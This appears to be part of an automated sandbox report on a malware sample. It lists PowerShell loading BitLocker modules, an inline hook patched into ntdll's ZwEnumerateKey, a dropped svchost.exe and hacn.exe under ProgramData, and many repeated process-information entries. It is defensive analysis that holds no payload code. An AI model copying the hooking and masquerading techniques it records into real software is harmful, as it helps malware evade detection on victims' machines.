Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\ProgramData\Microsoft\hacn.exe

Code function: 1_2_00007FF67D006F00 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00007FF67D006F00

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
